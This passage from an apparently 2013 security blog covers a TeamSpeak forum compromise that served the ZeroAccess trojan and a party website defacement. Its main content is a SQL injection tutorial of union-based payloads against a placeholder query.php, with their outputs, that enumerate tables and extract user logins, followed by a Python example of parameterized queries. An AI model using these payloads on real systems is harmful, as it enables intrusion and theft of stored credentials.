<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqEZS2j_yF67SM8llUmx9mCRBHe18JlHBbZOvtBXK7Kp3Grc-Og-a4EuEShmGf7UlH2LbeL_FjDpxlVQ43M7JJJM9bNgdYJ-tAI-DMXceeirZXeey7_eDdamOYOqojJZJ4CLz4wafp8sU/s1600/TeamSpeak_hacked_malware_injected.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqEZS2j_yF67SM8llUmx9mCRBHe18JlHBbZOvtBXK7Kp3Grc-Og-a4EuEShmGf7UlH2LbeL_FjDpxlVQ43M7JJJM9bNgdYJ-tAI-DMXceeirZXeey7_eDdamOYOqojJZJ4CLz4wafp8sU/s320/TeamSpeak_hacked_malware_injected.png" width="320" /></a></div>
<div style="text-align: justify;">
TeamSpeak is a very famous Brazilian company that offers <a href="http://www.voiceofgreyhat.com/search?q=voip">(VoIP)</a> software that allows computer users to speak on a chat channel with fellow computer users, much like a telephone conference call. Users use the TeamSpeak client software to connect to a TeamSpeak server of their choice; from there they can join chat channels and enjoy the excellent VoIP service. It is mostly used by millions of gamers across the globe. </div>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0nv1domNInuZLxM6wzIMfNtEfkJqMnn_b0LiX6xajqcLuPYkyOMIe9BWfGrycba6Q1UuXOjLZj6r4KcI1Drx77BBYhAdwPbJEe-vT-d3BO2r8HrWfl0CwmI6TXoBhyphenhyphenlMFYNVQeDKJgUU/s1600/TeamSpeak_hacked_malware_injected1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0nv1domNInuZLxM6wzIMfNtEfkJqMnn_b0LiX6xajqcLuPYkyOMIe9BWfGrycba6Q1UuXOjLZj6r4KcI1Drx77BBYhAdwPbJEe-vT-d3BO2r8HrWfl0CwmI6TXoBhyphenhyphenlMFYNVQeDKJgUU/s320/TeamSpeak_hacked_malware_injected1.png" width="320" /></a>Basically we can consider TeamSpeak a high-value target, and so did the hacker. Researchers said that the <a href="http://www.voiceofgreyhat.com/search?q=exploit">exploit</a> kit landing page is hosted on <span style="color: red;">atvisti.ro</span>, a forum for ATV enthusiasts that has also been compromised. In a statement, well-known malware analyst & security researcher Jerome Segura said that if the <a href="http://www.voiceofgreyhat.com/search?q=java+exploit">Java exploit</a> succeeds, the final <a href="http://www.voiceofgreyhat.com/search?q=payload">payload</a> is loaded. In this particular example, the payload was the <b><span style="color: red;">Zero Access Trojan</span></b>, which an anti-malware product from Malwarebytes detects as <b><span style="color: red;">Rootkit.0Access</span></b>. A bit of a relief is that the malware has not yet been spotted in the wild. According to statistics from <a href="https://www.virustotal.com/en/file/bb559ecbfb0f2f0ad85fd8ed120e28c1858d6fce92d5bd627a86858860a9858a/analysis/1385492895/">Virus Total</a>, only 7 of 46 leading antivirus products can detect this type of malware.
Exactly like TeamSpeak, a few days earlier <a href="http://www.kahusecurity.com/2013/jjencode-script-leads-to-drive-by/">Kahu Security</a> researchers uncovered a similar compromise on the forum for the Nissan Pathfinder Off Road Association <a href="http://www.nissanpathfinders.net/">(NPORA)</a>; in both cases, <b><a href="http://utf-8.jp/public/jjencode.html">JJEncode</a></b> was used to obfuscate the malicious script. To avoid further infection, the TeamSpeak forum has already been informed, and as expected they have overcome this issue. For a detailed analysis of the above-mentioned <a href="http://www.voiceofgreyhat.com/search?q=malware">malware</a> you can visit the official blog post of <a href="http://blog.malwarebytes.org/exploits-2/2013/11/teamspeaks-brazilian-forum-compromised-redirects-to-malware/">Malwarebytes</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-27360821902090136342013-12-02T01:05:00.000+05:302013-12-02T01:14:47.040+05:30Pakistan People's Party Official Website Hacked By Dr41DeY (Nigerian Cyber Army)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">Pakistan People's Party (PPP)</span></b> Official Website <b>Hacked </b>By <b><span style="color: red;">Dr41DeY</span></b> <b>(Nigerian Cyber Army)</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgOs7u9ayvnaIdRmXTdYWQrkDf9oWK6R0lM8lhbpvWu-luULZC8vhjVzIdCVlEjmwAYtTpv5w8NZoZjhYoLcsjuZyf-MPVBKg2z7GuM7sa-7plTbP34jINdlPPi6DGoQ8Z5KSi0J8Pn6U/s1600/Pakistan_Peoples_Party_Hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgOs7u9ayvnaIdRmXTdYWQrkDf9oWK6R0lM8lhbpvWu-luULZC8vhjVzIdCVlEjmwAYtTpv5w8NZoZjhYoLcsjuZyf-MPVBKg2z7GuM7sa-7plTbP34jINdlPPi6DGoQ8Z5KSi0J8Pn6U/s400/Pakistan_Peoples_Party_Hacked.png" width="400" /></a></div>
<span style="text-align: justify;">A new young hacker going by the alias </span><b style="text-align: justify;"><span style="color: red;">Dr41DeY</span></b><span style="text-align: justify;">, from a newly formed <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers community</a> named </span><b style="text-align: justify;">Nigerian Cyber Army</b><span style="text-align: justify;">, targeted a high-profile website of <a href="http://www.voiceofgreyhat.com/search?q=Pakistan">Pakistan</a> and hit the official website of </span><b style="text-align: justify;"><a href="http://www.ppp.org.pk/">Pakistan People's Party (PPP)</a></b><span style="text-align: justify;">. As per relevant sources, this <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attack</a> took place on November 30th. The hacker managed to gain access to the PPP server, and after gaining access he deleted important files from the server and changed the site index page. In other words, he <a href="http://www.voiceofgreyhat.com/search/label/defacement">defaced</a> the People's Party index page with the logo of Nigerian Cyber Army while leaving a few warnings for the webmaster. After the hack, the hacker created what he called an </span><a href="http://gyazo.com/0b224bbe5a5f5fd540c83c103b29856b" style="text-align: justify;">image archive</a><span style="text-align: justify;"> to prove the defacement. The People's Party has not yet officially responded to this issue, but immediately after the hack took place, PPP authorities took their site offline. And after a few years the index page was restored, displaying the message <i><span style="color: red;">"Website is under Development, it will come live soon. Sorry for inconvenience"</span></i>. At the time of writing this story, the website of PPP remained under construction. </span><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><u>Brief About Pakistan People's Party (PPP):-</u></b> The Pakistan Peoples Party (PPP) is a mainstream political party in Pakistan. It is led by "life chairperson" <b>Benazir Bhutto</b>. The Pakistan Peoples Party Parliamentarians (PPPP) is a party formed in 2002 by the PPP for the purpose of complying with electoral rules governing Pakistani parties. At the last legislative elections, 20 October 2002, the party won 25.8 % of the popular vote and 71 out of 272 elected members, thus gaining the second-largest number of seats in the Parliament of Pakistan. The party was founded in 1967, on November 30th and Zulfikar Ali Bhutto became its first chairman. The party creed is: "Islam is our faith; democracy is our politics; socialism is our economy; all power to the people."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-18881884879354912882013-12-02T01:00:00.000+05:302013-12-02T01:00:52.333+05:30We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">We Are The Best Tool For Web Application Security</span></b> <b>(Discovering The Infamous Sql-injection Technique)</b></span> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJPIRHi2f9TBPT8uodIii7qcHkTESL33RfFvNSegAWw0ZIyRcg3Ym-RQoqKbKnCj6bRkJcB9Bc7pT8nQGbVEV1KRnPXjX7bE39VOZT-8CXpTNc0iXhF1kVQvw3tPoKCp2xr1_0jbOwwg/s1600/Sql-injection_Technique_vogh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJPIRHi2f9TBPT8uodIii7qcHkTESL33RfFvNSegAWw0ZIyRcg3Ym-RQoqKbKnCj6bRkJcB9Bc7pT8nQGbVEV1KRnPXjX7bE39VOZT-8CXpTNc0iXhF1kVQvw3tPoKCp2xr1_0jbOwwg/s400/Sql-injection_Technique_vogh.jpg" width="400" /></a></div>
<br />
Today I am proudly sharing an article by <b>Mr. Rafael Souza</b>, one of the great admirers and fans of <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>, who has gladly shared his brilliant research paper on <b><a href="http://www.voiceofgreyhat.com/search?q=sql-i">SQL-Injection (MySql)</a></b> with us. Rafael is very passionate about the <a href="http://www.voiceofgreyhat.com/search?q=cyber+security">cyber security</a> domain and he is keenly involved with <b>GreyHat</b> Community and Maintainer design of Brazilian <b><a href="http://www.voiceofgreyhat.com/search?q=Backtrack">Backtrack Team</a></b>. So without wasting time, let's go and see what Rafael has for us:- </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;"><b>Discover The Infamous MySQL Injection Technique</b> </span><br />
<div style="text-align: left;">
<span style="text-align: right;"><span style="font-size: large;"> </span></span></div>
</div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4UaP9-PJzUpe3URNaRkqNgJiqQazrtHyf_WfrjAkJQqAcGux4y1Rkbn78KjmKuG-Gak08pGXFxteNavkprhxJbjYdLZ-VH3ERfl1XKAPNFfUYKk7wL2jiB8U4SG8xavMkI1HiCSR94sE/s1600/rafael_souza_vogh.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4UaP9-PJzUpe3URNaRkqNgJiqQazrtHyf_WfrjAkJQqAcGux4y1Rkbn78KjmKuG-Gak08pGXFxteNavkprhxJbjYdLZ-VH3ERfl1XKAPNFfUYKk7wL2jiB8U4SG8xavMkI1HiCSR94sE/s200/rafael_souza_vogh.png" width="178" /></a><span style="font-family: inherit;"><b><u>ABSTRACT:</u></b></span><br />
<div style="text-align: justify;">
<span style="font-family: inherit;">It is known that computers and software are developed and designed by humans, and human error is a reflection of a mental response to a particular activity. </span><span style="font-family: inherit;">Did you know that numerous inventions and discoveries are due to misconceptions?</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">There are levels of human performance based on the behavior of the mental response. Explained more comprehensively: we humans tend to err, and for this reason we are the greatest tool for finding these errors; even the software for vulnerability analysis and scanning was improved by us.</span></div>
<br />
<span style="font-family: inherit;"><b><u>Understand the technique MySQL Injection: </u></b></span><br />
<div style="text-align: justify;">
<span style="font-family: inherit;">One of the best-known fraud techniques among web developers is SQL Injection. It is the manipulation of a SQL statement through the variables that make up the parameters received by a server-side script; it is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query by manipulating the input data of an application. </span></div>
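<div style="text-align: justify;">
The difference between a query built by concatenation and one with a bound parameter, as an added example that is not part of Rafael's paper. It uses Python's sqlite3 as a stand-in for the PHP/MySQL stack behind query.php; the table layout, the sample rows and the function names are assumptions constructed for the demonstration.</div>

```python
import sqlite3

# Fixed statement text; only the id value is meant to vary per request.
PAGE_QUERY = "SELECT id, a, b, c, texto FROM fontes WHERE id = "


def make_db():
    """Constructed in-memory stand-in for the database behind query.php."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE fontes (id INTEGER, a TEXT, b TEXT, c TEXT, texto TEXT);
        INSERT INTO fontes VALUES (1, 'a1', 'b1', 'c1', 'public article text');
        CREATE TABLE usuarios (login TEXT, passwd TEXT, id INTEGER, texto TEXT);
        INSERT INTO usuarios VALUES ('_Rafa_', 'rafael1337', 1, 'bio');
        """
    )
    return db


def lookup_vulnerable(db, string_param):
    # The request parameter is concatenated into the statement, so the
    # database parses whatever the client sent as SQL syntax.
    return db.execute(PAGE_QUERY + string_param).fetchall()


def lookup_parameterized(db, string_param):
    # The statement text is fixed; the parameter is bound as a value and is
    # only ever compared with the id column, never parsed as SQL.
    return db.execute(PAGE_QUERY + "?", (string_param,)).fetchall()


def respond(db, string_param):
    """Handler shape: bound parameter plus a generic error body.

    Database error text (the 'Unknown column ...' messages quoted in this
    article) belongs in the server log, not in the HTTP response.
    """
    try:
        rows = lookup_parameterized(db, string_param)
    except sqlite3.Error:
        return 500, "internal error"
    return (200, rows[0][4]) if rows else (404, "not found")


if __name__ == "__main__":
    db = make_db()
    injected = "1 union all select 1,2,3,4,passwd from usuarios--"
    print("concatenated :", lookup_vulnerable(db, injected))
    print("parameterized:", lookup_parameterized(db, injected))
    print("handler      :", respond(db, "1"), respond(db, injected))
```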
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<b><u>STEP BY STEP</u></b></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikg4BMjrdtm9pS10PVhiwZ8JPZ9CgauU2mCByDG0Rts89IFQqPgPRbycH9EL8PJuOjOPSLQ4BhbsVbHLN2jHbgpKj_sYw3p0lUnM9GbrXLPYoDUBLTax2P__rEe2oP_ln2KVRVpev01Fg/s1600/sqli.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikg4BMjrdtm9pS10PVhiwZ8JPZ9CgauU2mCByDG0Rts89IFQqPgPRbycH9EL8PJuOjOPSLQ4BhbsVbHLN2jHbgpKj_sYw3p0lUnM9GbrXLPYoDUBLTax2P__rEe2oP_ln2KVRVpev01Fg/s400/sqli.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 1) Detecting</span></div>
<div style="text-align: justify;">
Searching Column number (s): We will test earlier in error, then no error may be said to find.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvfp6d5seaPwpH9s4P7VZ8JUZADWRis_57aVUQRlh8sodyD5CzxCLyfQD6DlDABFuRY23jvFiZc9YDqzQ9hCodhSkkjICN0JoRytwfWbayHnQF-Agwv_I8gMEpQWngscgGKUttod2yHs/s1600/sqli2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvfp6d5seaPwpH9s4P7VZ8JUZADWRis_57aVUQRlh8sodyD5CzxCLyfQD6DlDABFuRY23jvFiZc9YDqzQ9hCodhSkkjICN0JoRytwfWbayHnQF-Agwv_I8gMEpQWngscgGKUttod2yHs/s320/sqli2.jpg" width="279" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 2) SQL Error </span></div>
<div style="text-align: left;">
<div>
Host Information,</div>
<div>
Version of MySQL system used on the server.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi90G_rz1IsTnbYgiHzEy-PhCDXjVsbQ1CPgi27S0zOObxdqHTMo5GcHCki8Mb4R7DQuLcysdoX7koWXy4DnBQ9MfeTjaRBKuxaoIcjXB3IqFt63pNm9odWWvB8OSxpwCnh1jhlHBYsyDA/s1600/sqli3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi90G_rz1IsTnbYgiHzEy-PhCDXjVsbQ1CPgi27S0zOObxdqHTMo5GcHCki8Mb4R7DQuLcysdoX7koWXy4DnBQ9MfeTjaRBKuxaoIcjXB3IqFt63pNm9odWWvB8OSxpwCnh1jhlHBYsyDA/s400/sqli3.jpg" width="400" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 3) Host Information</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5kIsEgUWc9wIqbeLxhrodTlYTLyLhyLGEBz9Bmj6kBlJe6zGrIcgRPhkNFXqFzSJJFqkNyJlA2uAiz3CkhkkmvOxVt7aJ-_f3jD5kfIAu_3trqC4Y2-vwpNc1gMr4EsSDJ7CRM9sCic/s1600/sqli4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5kIsEgUWc9wIqbeLxhrodTlYTLyLhyLGEBz9Bmj6kBlJe6zGrIcgRPhkNFXqFzSJJFqkNyJlA2uAiz3CkhkkmvOxVt7aJ-_f3jD5kfIAu_3trqC4Y2-vwpNc1gMr4EsSDJ7CRM9sCic/s320/sqli4.jpg" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 4) Location of the Files</span></div>
<div>
Current database connection used between the "input" to the MySQL system</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBRALEEZ93ippC6PnR_VL1KZSZsXCHdAuaSfsedwrRdHKkA2yzG0buT8wcVhVa8qoOcZLvreaEvwQmx7Insrrve-9Qoj3s2BkbKej2FxEqOq8qfn96e5G406LA8ZyQFLk5swkResCGRtA/s1600/sqli5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBRALEEZ93ippC6PnR_VL1KZSZsXCHdAuaSfsedwrRdHKkA2yzG0buT8wcVhVa8qoOcZLvreaEvwQmx7Insrrve-9Qoj3s2BkbKej2FxEqOq8qfn96e5G406LA8ZyQFLk5swkResCGRtA/s320/sqli5.jpg" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 5) Users of MySQL</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1lN_2x8CR2WXhY0-0qMDuC73mPV8PhFGpyG0YLEkSUkcnNdRsGgw2sp16Lveb3kcJQZ7ctBwT1HpbGgyS73tEcAGgRho3B5C6-IdQFqpwztNHqk8W_bhM8YsSI_IKCHTeuovsr_FTZRk/s1600/sqli6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1lN_2x8CR2WXhY0-0qMDuC73mPV8PhFGpyG0YLEkSUkcnNdRsGgw2sp16Lveb3kcJQZ7ctBwT1HpbGgyS73tEcAGgRho3B5C6-IdQFqpwztNHqk8W_bhM8YsSI_IKCHTeuovsr_FTZRk/s320/sqli6.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;"><span style="font-size: x-small;">(Figure 6) Current Time</span></span></div>
<div>
<div>
Brute Force or Shooting</div>
<div>
This happens in versions below 5.x.y</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJAZR7xYgPaMHSx5TCvwyA9uEAwTDlgC7prHcuCF7yhiTyW-O_DE1PqoihvtGZA7Q7MNWQvmdGrCVxy0dOAQ_JI1_shYNYP4ZXhZt8dfopKnA9S4cSO9QPA2YFsAX2PQdfUxtaooogw0o/s1600/sqli7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJAZR7xYgPaMHSx5TCvwyA9uEAwTDlgC7prHcuCF7yhiTyW-O_DE1PqoihvtGZA7Q7MNWQvmdGrCVxy0dOAQ_JI1_shYNYP4ZXhZt8dfopKnA9S4cSO9QPA2YFsAX2PQdfUxtaooogw0o/s320/sqli7.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;">(Figure 7) Testing</span></div>
<div>
<div class="MsoNoSpacing">
<u><b><span lang="PT-BR"><span style="font-family: inherit;"><br /></span></span></b></u></div>
<div class="MsoNoSpacing">
<u><b><span lang="PT-BR"><span style="font-family: inherit;">Dump: </span></span></b><b style="font-family: inherit;"><span lang="PT-BR">This happens in versions 5.x.y and up <span style="color: dimgrey;">[ 1st Method ]</span></span></b></u><span lang="PT-BR" style="font-family: inherit;"></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><span lang="PT-BR"><span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">group_concat(table_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_schema=</span><span style="color: #8b4500;">database()</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span><span lang="PT-BR"><br />
or<br />
Unknown column '<span style="color: mediumpurple;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span>'
in 'where clause' <br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span>'
at line 1 <br />
<br />
<>------------------------<>-------------------------<>--------------------------<>
<br />
<br />
<b><span style="color: dimgrey;">[ 2nd Method ]</span></b> <br />
<br />
<span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">concat(table_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">0,1</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">CHARACTER_SETS</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">CHARACTER_SETS</span>' in
'where clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">CHARACTER_SETS</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(table_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">1,2</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">COLLATIONS</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">COLLATIONS</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">COLLATIONS</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(table_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">16,17</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">usuarios</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">usuarios</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">usuarios</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(table_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.tables
</span><span style="color: #fdb910;">limit</span> <span style="color: deeppink;">17,18</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">rafael</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">rafael</span>' in 'where
clause' <br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">rafael</span>'
at line 1 <span style="color: mediumpurple;"><o:p></o:p></span></span></span></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<span style="font-family: inherit;"><b><span lang="PT-BR">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span></b><span lang="PT-BR"><o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><span lang="PT-BR"><br />
</span><b><span lang="PT-BR">Searching
Column (s) of a given table<o:p></o:p></span></b></span></div>
<div class="MsoNoSpacing">
<b><span lang="PT-BR"><span style="font-family: inherit;">* Brute
Force / Shooting<o:p></o:p></span></span></b></div>
<div class="MsoNoSpacing">
<b><span lang="PT-BR"><span style="font-family: inherit;">This
happens in versions below 5.x.y<o:p></o:p></span></span></b></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">nome </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="PT-BR"><span style="font-family: inherit;">Unknown
column '<span style="color: firebrick;">rafael1</span>' in 'field list' <br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: firebrick;">rafael1</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">churros </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="PT-BR"><span style="font-family: inherit;">Unknown
column '<span style="color: firebrick;">rafael1</span>' in 'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: firebrick;">rafael1</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">login </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_Rafa_</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">_Rafa_</span>' in 'field list'
<br />
or<br />
You have an error in your SQL syntax; check the manual that corresponds to your
